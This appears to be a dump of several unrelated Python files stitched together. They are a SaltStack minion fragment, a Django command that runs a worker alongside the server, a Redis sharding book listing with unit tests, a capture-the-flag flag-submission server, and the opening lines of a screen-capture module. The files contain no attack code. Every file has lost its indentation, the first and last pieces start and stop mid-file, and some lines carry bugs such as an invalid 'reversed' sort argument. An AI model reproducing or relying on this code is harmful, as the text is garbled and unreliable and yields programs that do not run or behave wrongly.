# Nodegroups should already be expanded/resolved to other engines
log.error('Detected nodegroup expansion failure of "{0}"'.format(word))
return False
engine = ref.get(target_info['engine'])
if not engine:
# If an unknown engine is called at any time, fail out
log.error('Unrecognized target engine "{0}" for'
' target expression "{1}"'.format(
target_info['engine'],
word,
)
)
return False
engine_args = [target_info['pattern']]
engine_kwargs = {}
if target_info['delimiter']:
engine_kwargs['delimiter'] = target_info['delimiter']
results.append(
str(getattr(self, '{0}_match'.format(engine))(*engine_args, **engine_kwargs))
)
else:
# The match is not explicitly defined, evaluate it as a glob
results.append(str(self.glob_match(word)))
results = ' '.join(results)
log.debug('compound_match {0} ? "{1}" => "{2}"'.format(self.opts['id'], tgt, results))
try:
return eval(results) # pylint: disable=W0123
except Exception:
log.error('Invalid compound target: {0} for results: {1}'.format(tgt, results))
return False
return False
def nodegroup_match(self, tgt, nodegroups):
'''
This is a compatibility matcher and is NOT called when using
nodegroups for remote execution, but is called when the nodegroups
matcher is used in states
'''
if tgt in nodegroups:
return self.compound_match(
salt.utils.minions.nodegroup_comp(tgt, nodegroups)
)
return False
class ProxyMinionManager(MinionManager):
'''
Create the multi-minion interface but for proxy minions
'''
def _create_minion_object(self, opts, timeout, safe,
io_loop=None, loaded_base_name=None,
jid_queue=None):
'''
Helper function to return the correct type of object
'''
return ProxyMinion(opts,
timeout,
safe,
io_loop=io_loop,
loaded_base_name=loaded_base_name,
jid_queue=jid_queue)
class ProxyMinion(Minion):
'''
This class instantiates a 'proxy' minion--a minion that does not manipulate
the host it runs on, but instead manipulates a device that cannot run a minion.
'''
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
If this function is changed, please check Minion._post_master_init
to see if those changes need to be propagated.
ProxyMinions need a significantly different post master setup,
which is why the differences are not factored out into separate helper
functions.
'''
log.debug("subclassed _post_master_init")
if self.connected:
self.opts['master'] = master
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
saltenv=self.opts['environment'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
if 'proxy' not in self.opts['pillar'] and 'proxy' not in self.opts:
errmsg = 'No proxy key found in pillar or opts for id '+self.opts['id']+'. '+\
'Check your pillar/opts configuration and contents. Salt-proxy aborted.'
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=-1, msg=errmsg)
if 'proxy' not in self.opts:
self.opts['proxy'] = self.opts['pillar']['proxy']
fq_proxyname = self.opts['proxy']['proxytype']
# Need to load the modules so they get all the dunder variables
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
# we can then sync any proxymodules down from the master
# we do a sync_all here in case proxy code was installed by
# SPM or was manually placed in /srv/salt/_modules etc.
self.functions['saltutil.sync_all'](saltenv=self.opts['environment'])
# Then load the proxy module
self.proxy = salt.loader.proxy(self.opts)
# And re-load the modules so the __proxy__ variable gets injected
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.functions.pack['__proxy__'] = self.proxy
self.proxy.pack['__salt__'] = self.functions
self.proxy.pack['__ret__'] = self.returners
self.proxy.pack['__pillar__'] = self.opts['pillar']
# Start engines here instead of in the Minion superclass __init__
# This is because we need to inject the __proxy__ variable but
# it is not setup until now.
self.io_loop.spawn_callback(salt.engines.start_engines, self.opts,
self.process_manager, proxy=self.proxy)
if ('{0}.init'.format(fq_proxyname) not in self.proxy
or '{0}.shutdown'.format(fq_proxyname) not in self.proxy):
errmsg = 'Proxymodule {0} is missing an init() or a shutdown() or both. '.format(fq_proxyname)+\
'Check your proxymodule. Salt-proxy aborted.'
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=-1, msg=errmsg)
proxy_init_fn = self.proxy[fq_proxyname+'.init']
proxy_init_fn(self.opts)
self.opts['grains'] = salt.loader.grains(self.opts, proxy=self.proxy)
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners)
# add default scheduling jobs to the minions scheduler
if self.opts['mine_enabled'] and 'mine.update' in self.functions:
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2,
'return_job': self.opts.get('mine_return_job', False)
}
}, persist=True)
log.info('Added mine.update to scheduler')
else:
self.schedule.delete_job('__mine_interval', persist=True)
# add master_alive job if enabled
if (self.opts['transport'] != 'tcp' and
self.opts['master_alive_interval'] > 0):
self.schedule.add_job({
master_event(type='alive', master=self.opts['master']):
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
}, persist=True)
if self.opts['master_failback'] and \
'master_list' in self.opts and \
self.opts['master'] != self.opts['master_list'][0]:
self.schedule.add_job({
master_event(type='failback'):
{
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master_list'][0]}
}
}, persist=True)
else:
self.schedule.delete_job(master_event(type='failback'), persist=True)
else:
self.schedule.delete_job(master_event(type='alive', master=self.opts['master']), persist=True)
self.schedule.delete_job(master_event(type='failback'), persist=True)
# Sync the grains here so the proxy can communicate them to the master
self.functions['saltutil.sync_grains'](saltenv=self.opts['environment'])
self.grains_cache = self.opts['grains']
self.ready = True
|
runboth.py
|
from django.core.management.base import BaseCommand, CommandError
from django.core import management
from multiprocessing import Process
from journalist.worker import Worker
class Command(BaseCommand):
help = 'This command run grabber and Django server in different process in parallel'
def add_arguments(self, parser):
parser.add_argument('addrport', nargs='?', help='Optional parameter for specifying address and port')
def handle(self, *args, **options):
worker = Process(target=Worker().all())
worker.start()
print('Hello from main code!')
if options['addrport']:
pass
else:
pass
management.call_command('runserver', '--noreload', '--nothreading')
# worker.terminate()
|
ch10_listing_source.py
|
import binascii
from collections import defaultdict
from datetime import date
from decimal import Decimal
import functools
import json
from Queue import Empty, Queue
import threading
import time
import unittest
import uuid
import redis
CONFIGS = {}
CHECKED = {}
def get_config(conn, type, component, wait=1):
key = 'config:%s:%s'%(type, component)
if CHECKED.get(key) < time.time() - wait: #A
CHECKED[key] = time.time() #B
config = json.loads(conn.get(key) or '{}') #C
config = dict((str(k), config[k]) for k in config)
old_config = CONFIGS.get(key) #D
if config != old_config: #E
CONFIGS[key] = config #F
return CONFIGS.get(key)
REDIS_CONNECTIONS = {}
config_connection = None
def redis_connection(component, wait=1): #A
key = 'config:redis:' + component #B
def wrapper(function): #C
@functools.wraps(function) #D
def call(*args, **kwargs): #E
old_config = CONFIGS.get(key, object()) #F
_config = get_config( #G
config_connection, 'redis', component, wait) #G
config = {}
for k, v in _config.iteritems(): #L
config[k.encode('utf-8')] = v #L
if config != old_config: #H
REDIS_CONNECTIONS[key] = redis.Redis(**config) #H
return function( #I
REDIS_CONNECTIONS.get(key), *args, **kwargs) #I
return call #J
return wrapper #K
def index_document(conn, docid, words, scores):
pipeline = conn.pipeline(True)
for word in words: #I
pipeline.sadd('idx:' + word, docid) #I
pipeline.hmset('kb:doc:%s'%docid, scores)
return len(pipeline.execute()) #J
def parse_and_search(conn, query, ttl):
id = str(uuid.uuid4())
conn.sinterstore('idx:' + id,
['idx:'+key for key in query])
conn.expire('idx:' + id, ttl)
return id
def search_and_sort(conn, query, id=None, ttl=300, sort="-updated", #A
start=0, num=20): #A
desc = sort.startswith('-') #B
sort = sort.lstrip('-') #B
by = "kb:doc:*->" + sort #B
alpha = sort not in ('updated', 'id', 'created') #I
if id and not conn.expire(id, ttl): #C
id = None #C
if not id: #D
id = parse_and_search(conn, query, ttl=ttl) #D
pipeline = conn.pipeline(True)
pipeline.scard('idx:' + id) #E
pipeline.sort('idx:' + id, by=by, alpha=alpha, #F
desc=desc, start=start, num=num) #F
results = pipeline.execute()
return results[0], results[1], id #G
def zintersect(conn, keys, ttl):
id = str(uuid.uuid4())
conn.zinterstore('idx:' + id,
dict(('idx:'+k, v) for k,v in keys.iteritems()))
conn.expire('idx:' + id, ttl)
return id
def search_and_zsort(conn, query, id=None, ttl=300, update=1, vote=0, #A
start=0, num=20, desc=True): #A
if id and not conn.expire(id, ttl): #B
id = None #B
if not id: #C
id = parse_and_search(conn, query, ttl=ttl) #C
scored_search = { #D
id: 0, #D
'sort:update': update, #D
'sort:votes': vote #D
}
id = zintersect(conn, scored_search, ttl) #E
pipeline = conn.pipeline(True)
pipeline.zcard('idx:' + id) #F
if desc: #G
pipeline.zrevrange('idx:' + id, start, start + num - 1) #G
else: #G
pipeline.zrange('idx:' + id, start, start + num - 1) #G
results = pipeline.execute()
return results[0], results[1], id #H
def execute_later(conn, queue, name, args):
t = threading.Thread(target=globals()[name], args=tuple(args))
t.setDaemon(1)
t.start()
HOME_TIMELINE_SIZE = 1000
POSTS_PER_PASS = 1000
def shard_key(base, key, total_elements, shard_size): #A
if isinstance(key, (int, long)) or key.isdigit(): #B
shard_id = int(str(key), 10) // shard_size #C
else:
shards = 2 * total_elements // shard_size #D
shard_id = binascii.crc32(key) % shards #E
return "%s:%s"%(base, shard_id) #F
def shard_sadd(conn, base, member, total_elements, shard_size):
shard = shard_key(base,
'x'+str(member), total_elements, shard_size) #A
return conn.sadd(shard, member) #B
SHARD_SIZE = 512
EXPECTED = defaultdict(lambda: 1000000)
# <start id="get-connection"/>
def get_redis_connection(component, wait=1):
key = 'config:redis:' + component
old_config = CONFIGS.get(key, object()) #A
config = get_config( #B
config_connection, 'redis', component, wait) #B
if config != old_config: #C
REDIS_CONNECTIONS[key] = redis.Redis(**config) #C
return REDIS_CONNECTIONS.get(key) #D
# <end id="get-connection"/>
#A Fetch the old configuration, if any
#B Get the new configuration, if any
#C If the new and old configuration do not match, create a new connection
#D Return the desired connection object
#END
# <start id="get-sharded-connection"/>
def get_sharded_connection(component, key, shard_count, wait=1):
shard = shard_key(component, 'x'+str(key), shard_count, 2) #A
return get_redis_connection(shard, wait) #B
# <end id="get-sharded-connection"/>
#A Calculate the shard id of the form: <component>:<shard>
#B Return the connection
#END
# <start id="no-decorator-example"/>
def log_recent(conn, app, message):
'the old log_recent() code'
log_recent = redis_connection('logs')(log_recent) #A
# <end id="no-decorator-example"/>
#A This performs the equivalent decoration, but requires repeating the 'log_recent' function name 3 times
#END
# <start id="shard-aware-decorator"/>
def sharded_connection(component, shard_count, wait=1): #A
def wrapper(function): #B
@functools.wraps(function) #C
def call(key, *args, **kwargs): #D
conn = get_sharded_connection( #E
component, key, shard_count, wait) #E
return function(conn, key, *args, **kwargs) #F
return call #G
return wrapper #H
# <end id="shard-aware-decorator"/>
#A Our decorator is going to take a component name, as well as the number of shards desired
#B We are then going to create a wrapper that will actually decorate the function
#C Copy some useful metadata from the original function to the configuration handler
#D Create the function that will calculate a shard id for keys, and set up the connection manager
#E Fetch the sharded connection
#F Actually call the function, passing the connection and existing arguments
#G Return the fully wrapped function
#H Return a function that can wrap functions that need a sharded connection
#END
# <start id="sharded-count-unique"/>
@sharded_connection('unique', 16) #A
def count_visit(conn, session_id):
today = date.today()
key = 'unique:%s'%today.isoformat()
conn2, expected = get_expected(key, today) #B
id = int(session_id.replace('-', '')[:15], 16)
if shard_sadd(conn, key, id, expected, SHARD_SIZE):
conn2.incr(key) #C
@redis_connection('unique') #D
def get_expected(conn, key, today):
'all of the same function body as before, except the last line'
return conn, EXPECTED[key] #E
# <end id="sharded-count-unique"/>
#A We are going to shard this to 16 different machines, which will automatically shard to multiple keys on each machine
#B Our changed call to get_expected()
#C Use the returned non-sharded connection to increment our unique counts
#D Use a non-sharded connection to get_expected()
#E Also return the non-sharded connection so that count_visit() can increment our unique count as necessary
#END
# <start id="search-with-values"/>
def search_get_values(conn, query, id=None, ttl=300, sort="-updated", #A
start=0, num=20): #A
count, docids, id = search_and_sort( #B
conn, query, id, ttl, sort, 0, start+num) #B
key = "kb:doc:%s"
sort = sort.lstrip('-')
pipe = conn.pipeline(False)
for docid in docids: #C
pipe.hget(key%docid, sort) #C
sort_column = pipe.execute() #C
data_pairs = zip(docids, sort_column) #D
return count, data_pairs, id #E
# <end id="search-with-values"/>
#A We need to take all of the same parameters to pass on to search_and_sort()
#B First get the results of a search and sort
#C Fetch the data that the results were sorted by
#D Pair up the document ids with the data that it was sorted by
#E Return the count, data, and cache id of the results
#END
# <start id="search-on-shards"/>
def get_shard_results(component, shards, query, ids=None, ttl=300, #A
sort="-updated", start=0, num=20, wait=1): #A
count = 0 #B
data = [] #B
ids = ids or shards * [None] #C
for shard in xrange(shards):
conn = get_redis_connection('%s:%s'%(component, shard), wait)#D
c, d, i = search_get_values( #E
conn, query, ids[shard], ttl, sort, start, num) #E
count += c #F
data.extend(d) #F
ids[shard] = i #F
return count, data, ids #G
# <end id="search-on-shards"/>
#A In order to know what servers to connect to, we are going to assume that all of our shard information is kept in the standard configuration location
#B Prepare structures to hold all of our fetched data
#C Use cached results if we have any, otherwise start over
#D Get or create a connection to the desired shard
#E Fetch the search results and their sort values
#F Combine this shard's results with all of the other results
#G Return the raw results from all of the shards
#END
def get_values_thread(component, shard, wait, rqueue, *args, **kwargs):
conn = get_redis_connection('%s:%s'%(component, shard), wait)
count, results, id = search_get_values(conn, *args, **kwargs)
rqueue.put((shard, count, results, id))
def get_shard_results_thread(component, shards, query, ids=None, ttl=300,
sort="-updated", start=0, num=20, wait=1, timeout=.5):
ids = ids or shards * [None]
rqueue = Queue()
for shard in xrange(shards):
t = threading.Thread(target=get_values_thread, args=(
component, shard, wait, rqueue, query, ids[shard],
ttl, sort, start, num))
t.setDaemon(1)
t.start()
received = 0
count = 0
data = []
deadline = time.time() + timeout
while received < shards and time.time() < deadline:
try:
sh, c, r, i = rqueue.get(timeout=max(deadline-time.time(), .001))
except Empty:
break
else:
count += c
data.extend(r)
ids[sh] = i
return count, data, ids
# <start id="merge-sharded-results"/>
def to_numeric_key(data):
try:
return Decimal(data[1] or '0') #A
except:
return Decimal('0') #A
def to_string_key(data):
return data[1] or '' #B
def search_shards(component, shards, query, ids=None, ttl=300, #C
sort="-updated", start=0, num=20, wait=1): #C
count, data, ids = get_shard_results( #D
component, shards, query, ids, ttl, sort, start, num, wait) #D
reversed = sort.startswith('-') #E
sort = sort.strip('-') #E
key = to_numeric_key #E
if sort not in ('updated', 'id', 'created'): #E
key = to_string_key #E
data.sort(key=key, reverse=reversed) #F
results = []
for docid, score in data[start:start+num]: #G
results.append(docid) #G
return count, results, ids #H
# <end id="merge-sharded-results"/>
#A We are going to use the 'Decimal' numeric type here because it transparently handles both integers and floats reasonably, defaulting to 0 if the value wasn't numeric or was missing
#B Always return a string, even if there was no value stored
#C We need to take all of the sharding and searching arguments, mostly to pass on to lower-level functions, but we use the sort and search offsets
#D Fetch the results of the unsorted sharded search
#E Prepare all of our sorting options
#F Actually sort our results based on the sort parameter
#G Fetch just the page of results that we want
#H Return the results, including the sequence of cache ids for each shard
#END
# <start id="zset-search-with-values"/>
def search_get_zset_values(conn, query, id=None, ttl=300, update=1, #A
vote=0, start=0, num=20, desc=True): #A
count, r, id = search_and_zsort( #B
conn, query, id, ttl, update, vote, 0, 1, desc) #B
if desc: #C
data = conn.zrevrange(id, 0, start + num - 1, withscores=True)#C
else: #C
data = conn.zrange(id, 0, start + num - 1, withscores=True) #C
return count, data, id #D
# <end id="zset-search-with-values"/>
#A We need to accept all of the standard arguments for search_and_zsort()
#B Call the underlying search_and_zsort() function to get the cached result id and total number of results
#C Fetch all of the results we need, including their scores
#D Return the count, results with scores, and the cache id
#END
# <start id="search-shards-zset"/>
def search_shards_zset(component, shards, query, ids=None, ttl=300, #A
update=1, vote=0, start=0, num=20, desc=True, wait=1):#A
count = 0 #B
data = [] #B
ids = ids or shards * [None] #C
for shard in xrange(shards):
conn = get_redis_connection('%s:%s'%(component, shard), wait) #D
c, d, i = search_get_zset_values(conn, query, ids[shard], #E
ttl, update, vote, start, num, desc) #E
count += c #F
data.extend(d) #F
ids[shard] = i #F
def key(result): #G
return result[1] #G
data.sort(key=key, reversed=desc) #H
results = []
for docid, score in data[start:start+num]: #I
results.append(docid) #I
return count, results, ids #J
# <end id="search-shards-zset"/>
#A We need to take all of the sharding arguments along with all of the search arguments
#B Prepare structures for data to be returned
#C Use cached results if any, otherwise start from scratch
#D Fetch or create a connection to each shard
#E Perform the search on a shard and fetch the scores
#F Merge the results together
#G Prepare the simple sort helper to only return information about the score
#H Sort all of the results together
#I Extract the document ids from the results, removing the scores
#J Return the search results to the caller
#END
# <start id="sharded-api-base"/>
class KeyShardedConnection(object):
def __init__(self, component, shards): #A
self.component = component #A
self.shards = shards #A
def __getitem__(self, key): #B
return get_sharded_connection( #C
self.component, key, self.shards) #C
# <end id="sharded-api-base"/>
#A The object is initialized with the component name and number of shards
#B When an item is fetched from the object, this method is called with the item that was requested
#C Use the passed key along with the previously-known component and shards to fetch the sharded connection
#END
# <start id="sharded-api-example"/>
sharded_timelines = KeyShardedConnection('timelines', 8) #A
def follow_user(conn, uid, other_uid):
fkey1 = 'following:%s'%uid
fkey2 = 'followers:%s'%other_uid
if conn.zscore(fkey1, other_uid):
print "already followed", uid, other_uid
return None
now = time.time()
pipeline = conn.pipeline(True)
pipeline.zadd(fkey1, other_uid, now)
pipeline.zadd(fkey2, uid, now)
pipeline.zcard(fkey1)
pipeline.zcard(fkey2)
following, followers = pipeline.execute()[-2:]
pipeline.hset('user:%s'%uid, 'following', following)
pipeline.hset('user:%s'%other_uid, 'followers', followers)
pipeline.execute()
pkey = 'profile:%s'%other_uid
status_and_score = sharded_timelines[pkey].zrevrange( #B
pkey, 0, HOME_TIMELINE_SIZE-1, withscores=True) #B
if status_and_score:
hkey = 'home:%s'%uid
pipe = sharded_timelines[hkey].pipeline(True) #C
pipe.zadd(hkey, **dict(status_and_score)) #D
pipe.zremrangebyrank(hkey, 0, -HOME_TIMELINE_SIZE-1)#D
pipe.execute() #E
return True
# <end id="sharded-api-example"/>
#A Create a connection that knows about the sharding information for a given component with a number of shards
#B Fetch the recent status messages from the profile timeline of the now-followed user
#C Get a connection based on the shard key provided, and fetch a pipeline from that
#D Add the statuses to the home timeline ZSET on the shard, then trim it
#E Execute the transaction
#END
# <start id="key-data-sharded-api"/>
class KeyDataShardedConnection(object):
def __init__(self, component, shards): #A
self.component = component #A
self.shards = shards #A
def __getitem__(self, ids): #B
id1, id2 = map(int, ids) #C
if id2 < id1: #D
id1, id2 = id2, id1 #D
key = "%s:%s"%(id1, id2) #E
return get_sharded_connection( #F
self.component, key, self.shards) #F
# <end id="key-data-sharded-api"/>
#A The object is initialized with the component name and number of shards
#B When the pair of ids are passed as part of the dictionary lookup, this method is called
#C Unpack the pair of ids, and ensure that they are integers
#D If the second is less than the first, swap them so that the first id is less than or equal to the second
#E Construct a key based on the two ids
#F Use the computed key along with the previously-known component and shards to fetch the sharded connection
#END
_follow_user = follow_user
# <start id="sharded-api-example2"/>
sharded_timelines = KeyShardedConnection('timelines', 8) #A
sharded_followers = KeyDataShardedConnection('followers', 16) #A
def follow_user(conn, uid, other_uid):
fkey1 = 'following:%s'%uid
fkey2 = 'followers:%s'%other_uid
sconn = sharded_followers[uid, other_uid] #B
if sconn.zscore(fkey1, other_uid): #C
return None
now = time.time()
spipe = sconn.pipeline(True)
spipe.zadd(fkey1, other_uid, now) #D
spipe.zadd(fkey2, uid, now) #D
following, followers = spipe.execute()
pipeline = conn.pipeline(True)
pipeline.hincrby('user:%s'%uid, 'following', int(following)) #E
pipeline.hincrby('user:%s'%other_uid, 'followers', int(followers))#E
pipeline.execute()
pkey = 'profile:%s'%other_uid
status_and_score = sharded_timelines[pkey].zrevrange(
pkey, 0, HOME_TIMELINE_SIZE-1, withscores=True)
if status_and_score:
hkey = 'home:%s'%uid
pipe = sharded_timelines[hkey].pipeline(True)
pipe.zadd(hkey, **dict(status_and_score))
pipe.zremrangebyrank(hkey, 0, -HOME_TIMELINE_SIZE-1)
pipe.execute()
return True
# <end id="sharded-api-example2"/>
#A Create a connection that knows about the sharding information for a given component with a number of shards
#B Fetch the connection object for the uid,other_uid pair
#C Check to see if other_uid is already followed
#D Add the follower/following information to the ZSETs
#E Update the follower and following information for both users
#END
# <start id="sharded-zrangebyscore"/>
def sharded_zrangebyscore(component, shards, key, min, max, num): #A
data = []
for shard in xrange(shards):
conn = get_redis_connection("%s:%s"%(component, shard)) #B
data.extend(conn.zrangebyscore( #C
key, min, max, start=0, num=num, withscores=True)) #C
def key(pair): #D
return pair[1], pair[0] #D
data.sort(key=key) #D
return data[:num] #E
# <end id="sharded-zrangebyscore"/>
#A We need to take arguments for the component and number of shards, and we are going to limit the arguments to be passed on to only those that will ensure correct behavior in sharded situations
#B Fetch the sharded connection for the current shard
#C Get the data from Redis for this shard
#D Sort the data based on score then by member
#E Return only the number of items requested
#END
# <start id="sharded-syndicate-posts"/>
def syndicate_status(uid, post, start=0, on_lists=False):
root = 'followers'
key = 'followers:%s'%uid
base = 'home:%s'
if on_lists:
root = 'list:out'
key = 'list:out:%s'%uid
base = 'list:statuses:%s'
followers = sharded_zrangebyscore(root, #A
sharded_followers.shards, key, start, 'inf', POSTS_PER_PASS)#A
to_send = defaultdict(list) #B
for follower, start in followers:
timeline = base % follower #C
shard = shard_key('timelines', #D
timeline, sharded_timelines.shards, 2) #D
to_send[shard].append(timeline) #E
for timelines in to_send.itervalues():
pipe = sharded_timelines[timelines[0]].pipeline(False) #F
for timeline in timelines:
pipe.zadd(timeline, **post) #G
pipe.zremrangebyrank( #G
timeline, 0, -HOME_TIMELINE_SIZE-1) #G
pipe.execute()
conn = redis.Redis()
if len(followers) >= POSTS_PER_PASS:
execute_later(conn, 'default', 'syndicate_status',
[uid, post, start, on_lists])
elif not on_lists:
execute_later(conn, 'default', 'syndicate_status',
[uid, post, 0, True])
# <end id="sharded-syndicate-posts"/>
#A Fetch the next group of followers using the sharded ZRANGEBYSCORE call
#B Prepare a structure that will group profile information on a per-shard basis
#C Calculate the key for the timeline
#D Find the shard where this timeline would go
#E Add the timeline key to the rest of the timelines on the same shard
#F Get a connection to the server for the group of timelines, and create a pipeline
#G Add the post to the timeline, and remove any posts that are too old
#END
def _fake_shards_for(conn, component, count, actual):
assert actual <= 4
for i in xrange(count):
m = i % actual
conn.set('config:redis:%s:%i'%(component, i), json.dumps({'db':14 - m}))
class TestCh10(unittest.TestCase):
def _flush(self):
self.conn.flushdb()
redis.Redis(db=14).flushdb()
redis.Redis(db=13).flushdb()
redis.Redis(db=12).flushdb()
redis.Redis(db=11).flushdb()
def setUp(self):
self.conn = redis.Redis(db=15)
self._flush()
global config_connection
config_connection = self.conn
self.conn.set('config:redis:test', json.dumps({'db':15}))
def tearDown(self):
self._flush()
def test_get_sharded_connections(self):
_fake_shards_for(self.conn, 'shard', 2, 2)
for i in xrange(10):
get_sharded_connection('shard', i, 2).sadd('foo', i)
s0 = redis.Redis(db=14).scard('foo')
s1 = redis.Redis(db=13).scard('foo')
self.assertTrue(s0 < 10)
self.assertTrue(s1 < 10)
self.assertEquals(s0 + s1, 10)
def test_count_visit(self):
shards = {'db':13}, {'db':14}
self.conn.set('config:redis:unique', json.dumps({'db':15}))
for i in xrange(16):
self.conn.set('config:redis:unique:%s'%i, json.dumps(shards[i&1]))
for i in xrange(100):
count_visit(str(uuid.uuid4()))
base = 'unique:%s'%date.today().isoformat()
total = 0
for c in shards:
conn = redis.Redis(**c)
keys = conn.keys(base + ':*')
for k in keys:
cnt = conn.scard(k)
total += cnt
self.assertEquals(total, 100)
self.assertEquals(self.conn.get(base), '100')
def test_sharded_search(self):
_fake_shards_for(self.conn, 'search', 2, 2)
docs = 'hello world how are you doing'.split(), 'this world is doing fine'.split()
for i in xrange(50):
c = get_sharded_connection('search', i, 2)
index_document(c, i, docs[i&1], {'updated':time.time() + i, 'id':i, 'created':time.time() + i})
r = search_and_sort(c, docs[i&1], sort='-id')
self.assertEquals(r[1][0], str(i))
total = 0
for shard in (0,1):
count = search_get_values(get_redis_connection('search:%s'%shard),['this', 'world'], num=50)[0]
total += count
self.assertTrue(count < 50)
self.assertTrue(count > 0)
self.assertEquals(total, 25)
count, r, id = get_shard_results('search', 2, ['world', 'doing'], num=50)
self.assertEquals(count, 50)
self.assertEquals(count, len(r))
self.assertEquals(get_shard_results('search', 2, ['this', 'doing'], num=50)[0], 25)
count, r, id = get_shard_results_thread('search', 2, ['this', 'doing'], num=50)
self.assertEquals(count, 25)
self.assertEquals(count, len(r))
r.sort(key=lambda x:x[1], reverse=True)
r = list(zip(*r)[0])
count, r2, id = search_shards('search', 2, ['this', 'doing'])
self.assertEquals(count, 25)
self.assertEquals(len(r2), 20)
self.assertEquals(r2, r[:20])
def test_sharded_follow_user(self):
_fake_shards_for(self.conn, 'timelines', 8, 4)
sharded_timelines['profile:1'].zadd('profile:1', 1, time.time())
for u2 in xrange(2, 11):
sharded_timelines['profile:%i'%u2].zadd('profile:%i'%u2, u2, time.time() + u2)
_follow_user(self.conn, 1, u2)
_follow_user(self.conn, u2, 1)
self.assertEquals(self.conn.zcard('followers:1'), 9)
self.assertEquals(self.conn.zcard('following:1'), 9)
self.assertEquals(sharded_timelines['home:1'].zcard('home:1'), 9)
for db in xrange(14, 10, -1):
self.assertTrue(len(redis.Redis(db=db).keys()) > 0)
for u2 in xrange(2, 11):
self.assertEquals(self.conn.zcard('followers:%i'%u2), 1)
self.assertEquals(self.conn.zcard('following:%i'%u2), 1)
self.assertEquals(sharded_timelines['home:%i'%u2].zcard('home:%i'%u2), 1)
def test_sharded_follow_user_and_syndicate_status(self):
_fake_shards_for(self.conn, 'timelines', 8, 4)
_fake_shards_for(self.conn, 'followers', 4, 4)
sharded_followers.shards = 4
sharded_timelines['profile:1'].zadd('profile:1', 1, time.time())
for u2 in xrange(2, 11):
sharded_timelines['profile:%i'%u2].zadd('profile:%i'%u2, u2, time.time() + u2)
follow_user(self.conn, 1, u2)
follow_user(self.conn, u2, 1)
allkeys = defaultdict(int)
for db in xrange(14, 10, -1):
c = redis.Redis(db=db)
for k in c.keys():
allkeys[k] += c.zcard(k)
for k, v in allkeys.iteritems():
part, _, owner = k.partition(':')
if part in ('following', 'followers', 'home'):
self.assertEquals(v, 9 if owner == '1' else 1)
elif part == 'profile':
self.assertEquals(v, 1)
self.assertEquals(len(sharded_zrangebyscore('followers', 4, 'followers:1', '0', 'inf', 100)), 9)
syndicate_status(1, {'11':time.time()})
self.assertEquals(len(sharded_zrangebyscore('timelines', 4, 'home:2', '0', 'inf', 100)), 2)
if __name__ == '__main__':
unittest.main()
|
flags.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from classes.config.get import ConfigGet
from config.main import *
import multiprocessing
import socket
import sys
import time
import re
import pymongo
from ipaddress import IPv4Address, IPv4Network
from functions import Message
class Flags:
socket = None
def __init__(self, db):
self.db = db
self.conn = None
self.address = None
try:
self.life = CHECKER['LENGTH'] * CHECKER['ROUND_LENGTH']
self.port = CHECKER['PORT']
except KeyError:
Message.fail('Error with parse in response')
sys.exit(0)
def start(self):
Message.success('Class is initialized. Starting...\nListening on port {}'.format(CHECKER['PORT']))
try:
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.bind(('0.0.0.0', self.port))
self.socket.listen(CHECKER['MAX_CONNECTIONS']) # максимальное число соединений. учитывайте это при конфигурировании сервиса
while True:
self.conn, self.address = self.socket.accept()
Message.info('connected:' + self.address[0])
process = multiprocessing.Process(target=self.recv, args=(self.conn, self.address))
process.daemon = True
process.start()
except KeyboardInterrupt:
print('Module flags is shutdown')
self.conn.close()
exit(0)
def recv(self, connection, address):
teams = self.db.teams.find()
# ip = IPv4Address()
print(address)
team = False
for e in teams:
if IPv4Address(address[0]) in IPv4Network(e['network']):
print(e)
team = e
break
if not bool(team):
connection.send(('Who are you?\n Goodbye\n').encode())
connection.close()
else:
try:
self.process_one_team(connection, team)
except BrokenPipeError:
print('Client is disconnected')
sys.exit(0)
def process_one_team(self, connection, team):
connection.send(('Welcome! \nYour team - ' + team["name"] + '\n').encode())
while True:
data = connection.recv(1024)
data = str(data.rstrip().decode('utf-8'))
if not re.match('^\w{33}=$',data):
connection.send(('this is not flag\n').encode())
continue
flag = self.db.flags.find_one({'flag': data})
if not bool(flag):
connection.send(('Flag is not found\n').encode())
continue
if flag['team']['_id'] == team['_id']:
connection.send(('It`s your flag\n').encode())
continue
if (self.life + flag["timestamp"]) <= time.time():
connection.send(('This flag is too old\n').encode())
continue
status = self.db.scoreboard.find_one({
'team._id': team['_id'],
'service._id': flag['service']['_id']
})
if status["status"] != 'UP':
connection.send(('Your service '+ flag['service']['name'] +' is not working\n').encode())
continue
count_round = self.db.flags.find().sort([ ('round', pymongo.DESCENDING) ]).limit(1)[0]['round']
is_stolen = self.db.stolen_flags.find_one({
'team._id': team['_id'],
'flag._id': flag['_id']
})
if is_stolen:
connection.send(('You are already pass this flag\n').encode())
continue
self.db.stolen_flags.insert_one({
'team': team,
'flag': flag,
'round': count_round,
'timestamp': time.time()
})
self.db.flags.update_one({'flag': data}, {"$set": {"stolen": True}})
connection.send(('received\n').encode())
|
process.py
|
""" Orlov Plugins : Minicap Process Utility. """
import os
import io
import sys
import time
import logging
import threading
from queue import Queue
import cv2
from PIL import Image
import numpy as np
import fasteners
from orlov.libs.picture import Picture, Ocr
PATH = os.path.abspath(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
